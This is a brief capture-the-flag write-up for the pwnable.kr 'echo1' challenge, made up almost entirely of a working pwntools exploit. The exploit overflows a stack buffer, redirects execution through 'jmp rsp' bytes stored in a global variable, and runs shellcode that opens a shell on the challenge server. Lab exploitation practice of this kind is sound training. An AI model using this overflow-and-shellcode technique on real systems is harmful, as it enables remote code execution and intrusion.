
pwnable.kr-echo1-Writeup


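echo1 from pwnable is a stack overflow vulnerability. As before, I will add the analysis process and reasoning later; for now, here is the exp.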

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

elf = ELF('./echo1')
id_addr = elf.symbols['id']  # address of the global symbol `id`
#  print hex(id_addr)
jmp = asm('jmp rsp')  # machine code for `jmp rsp`
shellcode = asm(shellcraft.sh())

# io = process('./echo1')
io = remote('pwnable.kr', 9010)

# Send the `jmp rsp` bytes as the name
io.recvuntil('name? : ')
io.sendline(jmp)

# Choose menu option 1
io.recvuntil('> ')
io.sendline('1')

# 40 bytes of padding, then the address of `id` as the overwritten
# return address, then the shellcode
payload = 'A' * 40 + p64(id_addr) + shellcode
io.sendline(payload)

io.interactive()
io.close()

